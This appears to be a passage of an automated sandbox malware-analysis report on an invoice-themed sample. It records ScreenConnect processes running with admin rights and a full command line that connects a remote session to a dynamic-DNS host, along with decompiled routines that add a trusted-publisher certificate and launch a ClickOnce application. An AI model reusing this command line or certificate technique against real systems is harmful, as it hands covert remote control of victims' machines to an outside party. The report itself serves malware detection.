Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0xc90000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	00:23:08
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&s=89e470af-f42d-4b2f-ad1d-717711c7c76a&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
Imagebase:	0xc90000
File size:	95'520 bytes
MD5 hash:	361BCC2CB78C75DD6F583AF81834E447
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	00:23:09
Start date:	02/10/2024
Path:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe" "RunRole" "03b72f57-2802-4bff-bb34-56b3497bf3fc" "User"
Imagebase:	0x310000
File size:	601'376 bytes
MD5 hash:	20AB8141D958A58AADE5E78671A719BF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	1462
Total number of Limit Nodes:	4

Executed Functions

Function 00EF1000 Relevance: 54.4, APIs: 27, Strings: 4, Instructions: 199
encryptionmemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000000,00000104), ref: 00EF1016
GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 00EF1025
CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 00EF1032
LocalAlloc.KERNELBASE(00000000,00040000), ref: 00EF1057
LocalAlloc.KERNEL32(00000000,00040000), ref: 00EF1063
CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 00EF1082
CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 00EF10B2
LocalAlloc.KERNEL32(00000000,?), ref: 00EF10C5
LocalAlloc.KERNEL32(00000000,00002000), ref: 00EF10F4
CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 00EF110A
CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 00EF111A
CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 00EF112D
CertFreeCertificateContext.CRYPT32(00000000), ref: 00EF1134
LocalFree.KERNEL32(00000000), ref: 00EF113E
LocalFree.KERNEL32(00000000), ref: 00EF115D
CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 00EF116E
CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 00EF1182
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 00EF1198
CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 00EF11A9
LoadLibraryA.KERNELBASE(dfshim), ref: 00EF11BA
GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 00EF11C6
Sleep.KERNELBASE(00009C40), ref: 00EF11E8
CertDeleteCertificateFromStore.CRYPT32(?), ref: 00EF120B
CertCloseStore.CRYPT32(?,00000000), ref: 00EF121A
LocalFree.KERNEL32(?), ref: 00EF1223
LocalFree.KERNEL32(?), ref: 00EF1228
LocalFree.KERNEL32(?), ref: 00EF122D

Strings

TrustedPublisher, xrefs: 00EF102B
1.3.6.1.4.1.311.4.1.1, xrefs: 00EF1193, 00EF11A4
dfshim, xrefs: 00EF11B5
ShOpenVerbApplicationW, xrefs: 00EF11C0

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: Local$Cert$Free$AllocCrypt$CertificateParamStore$Context$AttributeFind$AddressCloseCreateDeleteFileFromLibraryLoadModuleNameObjectOpenProcQuerySleepSystem
String ID: 1.3.6.1.4.1.311.4.1.1$ShOpenVerbApplicationW$TrustedPublisher$dfshim
API String ID: 335784236-860318880
Opcode ID: e5349345ada2a23be51570b73583ce9493d09f49119964b78041be80c51d90c8
Instruction ID: 2ec11d51d28622366e4fb61a6b2ff7143d46260dc3600d2862693a54e91c2794
Opcode Fuzzy Hash: e5349345ada2a23be51570b73583ce9493d09f49119964b78041be80c51d90c8
Instruction Fuzzy Hash: FF614A71A4021CEFEB209B91DC49FBEBBB9EF88B50F140054EA14B7290CB719905DBA4

Non-executed Functions

Function 00EF191F Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00EF192B
IsDebuggerPresent.KERNEL32 ref: 00EF19F7
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EF1A10
UnhandledExceptionFilter.KERNEL32(?), ref: 00EF1A1A

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: f6c901f3773981e9780e516fa883ed06e2ef496ebf9472f92be6fe3612a885a0
Instruction ID: db49e439426a92669c1f459bb7a508c72a5a040685c5e82a11b82ec90e315332
Opcode Fuzzy Hash: f6c901f3773981e9780e516fa883ed06e2ef496ebf9472f92be6fe3612a885a0
Instruction Fuzzy Hash: 0F311475D0121CDBDB21DFA4D949BDDBBB8AF48300F1041EAE50CAB250EB719A84CF45

Function 00EF4573 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00EF466B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00EF4675
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00EF4682

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 2310e1fcff31dd62fdda464bb048949c586b7e8e983f17ec6cf331c8a56b9079
Instruction ID: 54feb9626298992a54917b97502374009cacc4abff5fc26d8ac8c21846222864
Opcode Fuzzy Hash: 2310e1fcff31dd62fdda464bb048949c586b7e8e983f17ec6cf331c8a56b9079
Instruction Fuzzy Hash: 1031C27590121CDBCB21DF64D888B9DBBB8BF48310F5051EAE51CA7290EB709F858F45

Function 00EF3677 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00EF364D,?,00F002E0,0000000C,00EF37A4,?,00000002,00000000,?,00EF3F66,00000003,00EF209F,00EF1AFC), ref: 00EF3698
TerminateProcess.KERNEL32(00000000,?,00EF364D,?,00F002E0,0000000C,00EF37A4,?,00000002,00000000,?,00EF3F66,00000003,00EF209F,00EF1AFC), ref: 00EF369F
ExitProcess.KERNEL32 ref: 00EF36B1

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 364d98a8d34a1251240b0416971fb6b753fe428397ccb04b380143f50f038a30
Instruction ID: cfe884deed7aeefd94d5183f8e0dd17e4efd6a7477246f76f2614e328b162da3
Opcode Fuzzy Hash: 364d98a8d34a1251240b0416971fb6b753fe428397ccb04b380143f50f038a30
Instruction Fuzzy Hash: C1E0463100010CFFCF11AF65DD09A6A3B69EF80349B014024FB09AA231DF35DE42CA90

Function 00EFA495 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00EFA490,?,?,00000008,?,?,00EFA130,00000000), ref: 00EFA6C2

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5f636dfe2fcb6296735a6064be2da4329207e43ed6dd84f9e9854b5e3ce75c08
Instruction ID: 774641e7a30e7cd550619b2bb76030043bc8239ba91465e97c797d95a255fcdf
Opcode Fuzzy Hash: 5f636dfe2fcb6296735a6064be2da4329207e43ed6dd84f9e9854b5e3ce75c08
Instruction Fuzzy Hash: 25B16E712106089FD715CF28C48AB647BE0FF44368F2996A9EA9EDF2E1C335D991CB41

Function 00EF1BD4 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00EF1BEA

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 078639fe85ee79c967bfe52eb0e9441cfc8f5d531d2d3ce145ea08df671b24ed
Instruction ID: 2617d9609a6938af79b36cd0507faf5a62e7598cef4e240f6323f273017aeea8
Opcode Fuzzy Hash: 078639fe85ee79c967bfe52eb0e9441cfc8f5d531d2d3ce145ea08df671b24ed
Instruction Fuzzy Hash: A85169B1E1060DCBEB18CF65D8817AEBBF4FB88358F2490AAD505EB290E3759940CF50

Function 00EF1AAC Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001AB8,00EF1300), ref: 00EF1AB1

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b9cdb089d0515024e21edb516c492b0389cb39a965cf955f0ccf64fa5007195a
Instruction ID: 8f5c8a04eed42d214960a289906c3a36eba9536c7a17ac7a3c03fce54ab1e6f9
Opcode Fuzzy Hash: b9cdb089d0515024e21edb516c492b0389cb39a965cf955f0ccf64fa5007195a
Instruction Fuzzy Hash:

Function 00EF6893 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00EF6893

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: ee47fec7188427533a7976991eae02e4bffe68aefd112a55d156dbad1cf450dc
Instruction ID: ed568b09476d941cf14b91d98a0b882872bc0835f484a5aec9589507a0389cdf
Opcode Fuzzy Hash: ee47fec7188427533a7976991eae02e4bffe68aefd112a55d156dbad1cf450dc
Instruction Fuzzy Hash: 38A002706011059F97508F359A59219359D674559175540555505D5160D7244454AA11

Function 00EF6507 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 00EF654B

Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF6095
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF60A7
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF60B9
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF60CB
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF60DD
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF60EF
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF6101
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF6113
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF6125
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF6137
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF6149
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF615B
Part of subcall function 00EF6078: _free.LIBCMT ref: 00EF616D

_free.LIBCMT ref: 00EF6540

Part of subcall function 00EF4869: HeapFree.KERNEL32(00000000,00000000,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?), ref: 00EF487F
Part of subcall function 00EF4869: GetLastError.KERNEL32(?,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?,?), ref: 00EF4891

_free.LIBCMT ref: 00EF6562
_free.LIBCMT ref: 00EF6577
_free.LIBCMT ref: 00EF6582
_free.LIBCMT ref: 00EF65A4
_free.LIBCMT ref: 00EF65B7
_free.LIBCMT ref: 00EF65C5
_free.LIBCMT ref: 00EF65D0
_free.LIBCMT ref: 00EF6608
_free.LIBCMT ref: 00EF660F
_free.LIBCMT ref: 00EF662C
_free.LIBCMT ref: 00EF6644

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 05ae2f7296a69ca4552518dcbf1eba12723d9621d9b9e93cd8ef68fea50074e9
Instruction ID: 0a888989d2ffdf25632b02a4fa0cbc3507562e755d65c9c67fe57f381669a2ac
Opcode Fuzzy Hash: 05ae2f7296a69ca4552518dcbf1eba12723d9621d9b9e93cd8ef68fea50074e9
Instruction Fuzzy Hash: 60314D716002889FEB64AB7AE805B7673E8AF40358F546929F649FB1D1DE31ED408B50

Function 00EF4330 Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 00EF4344

Part of subcall function 00EF4869: HeapFree.KERNEL32(00000000,00000000,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?), ref: 00EF487F
Part of subcall function 00EF4869: GetLastError.KERNEL32(?,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?,?), ref: 00EF4891

_free.LIBCMT ref: 00EF4350
_free.LIBCMT ref: 00EF435B
_free.LIBCMT ref: 00EF4366
_free.LIBCMT ref: 00EF4371
_free.LIBCMT ref: 00EF437C
_free.LIBCMT ref: 00EF4387
_free.LIBCMT ref: 00EF4392
_free.LIBCMT ref: 00EF439D
_free.LIBCMT ref: 00EF43AB

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f9e3906f9fa5046c1b9bef9514bb91ab56ccefe8de48ecc9b7ffde4a2045fc21
Instruction ID: 7d3a28a768ebd3c03f0a0cb7c723202fbc3cfa939250bc9e7661f2f2a6ffc65e
Opcode Fuzzy Hash: f9e3906f9fa5046c1b9bef9514bb91ab56ccefe8de48ecc9b7ffde4a2045fc21
Instruction Fuzzy Hash: 10118CB66001CCFFCB45EF96E842CEA3BA5EF44790F515165BA085F2B2D631DE509B40

Function 00EF7AB4 Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,00EF54C8,00000000,?,?,?,00EF7D05,?,?,00000100), ref: 00EF7B0E
__alloca_probe_16.LIBCMT ref: 00EF7B46
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00EF7D05,?,?,00000100,5EFC4D8B,?,?), ref: 00EF7B94
__alloca_probe_16.LIBCMT ref: 00EF7C2B
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EF7C8E
__freea.LIBCMT ref: 00EF7C9B

Part of subcall function 00EF62FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00EF7E5B,?,00000000,?,00EF686F,?,00000004,00000000,?,?,?,00EF3BCD), ref: 00EF6331

__freea.LIBCMT ref: 00EF7CA4
__freea.LIBCMT ref: 00EF7CC9

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: ee7b31216d8af7f26653d3364669dc9000197736178296c9f67dcccba904ef8e
Instruction ID: a66203e1ae4e7c2f0aca9d1655773d566133a300ed5c861250250d87617a8396
Opcode Fuzzy Hash: ee7b31216d8af7f26653d3364669dc9000197736178296c9f67dcccba904ef8e
Instruction Fuzzy Hash: B351EF7261460AAFEB258F64CC91EBBB7AAEB48754B155628FE44F7140EB30DC40C6A0

Function 00EF8417 Relevance: 10.7, APIs: 7, Instructions: 152
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00EF8B8C,?,00000000,?,00000000,00000000), ref: 00EF8459
__fassign.LIBCMT ref: 00EF84D4
__fassign.LIBCMT ref: 00EF84EF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00EF8515
WriteFile.KERNEL32(?,?,00000000,00EF8B8C,00000000,?,?,?,?,?,?,?,?,?,00EF8B8C,?), ref: 00EF8534
WriteFile.KERNEL32(?,?,00000001,00EF8B8C,00000000,?,?,?,?,?,?,?,?,?,00EF8B8C,?), ref: 00EF856D

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: dfba301a5c73e5848092ea13543788ea7066f6889973e1be4fdab98260876f2f
Instruction ID: 5feeccab7830f23a3755d8d8504d533c43a42dcde5936305657f6f59d4e5d143
Opcode Fuzzy Hash: dfba301a5c73e5848092ea13543788ea7066f6889973e1be4fdab98260876f2f
Instruction Fuzzy Hash: 6A518FB1A002499FDB10CFA8D985AFEBBF8FF58300F14515AEA55F7291DB309A41CB60

Function 00EF1E00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 00EF1E37
___except_validate_context_record.LIBVCRUNTIME ref: 00EF1E3F
_ValidateLocalCookies.LIBCMT ref: 00EF1EC8
__IsNonwritableInCurrentImage.LIBCMT ref: 00EF1EF3
_ValidateLocalCookies.LIBCMT ref: 00EF1F48

Strings

csm, xrefs: 00EF1EDD

Memory Dump Source

Source File: 00000000.00000002.1842351429.0000000000EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EF0000, based on PE: true

Associated: 00000000.00000002.1842337891.0000000000EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842372728.0000000000EFB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842388665.0000000000F01000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1842403334.0000000000F03000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ef0000_E_BILL9926378035.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f5572f7c5debd200b19a7ee6d546cbf5fde2afc1404009b1fce5f014fc5f4826
Instruction ID: 9da1291169b955db35705aba1d3aac245ef8e548dbd1bdad377acb013a0dbbea
Opcode Fuzzy Hash: f5572f7c5debd200b19a7ee6d546cbf5fde2afc1404009b1fce5f014fc5f4826
Instruction Fuzzy Hash: 1A41AF34A0020DDBCF10DF68C885ABEBBF5BF45358F149095EA15BB292D732AA15CB91

Function 00EF621B Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EF61DF: _free.LIBCMT ref: 00EF6208

_free.LIBCMT ref: 00EF6269

Part of subcall function 00EF4869: HeapFree.KERNEL32(00000000,00000000,?,00EF620D,?,00000000,?,00000000,?,00EF6234,?,00000007,?,?,00EF669F,?), ref: 00EF487F
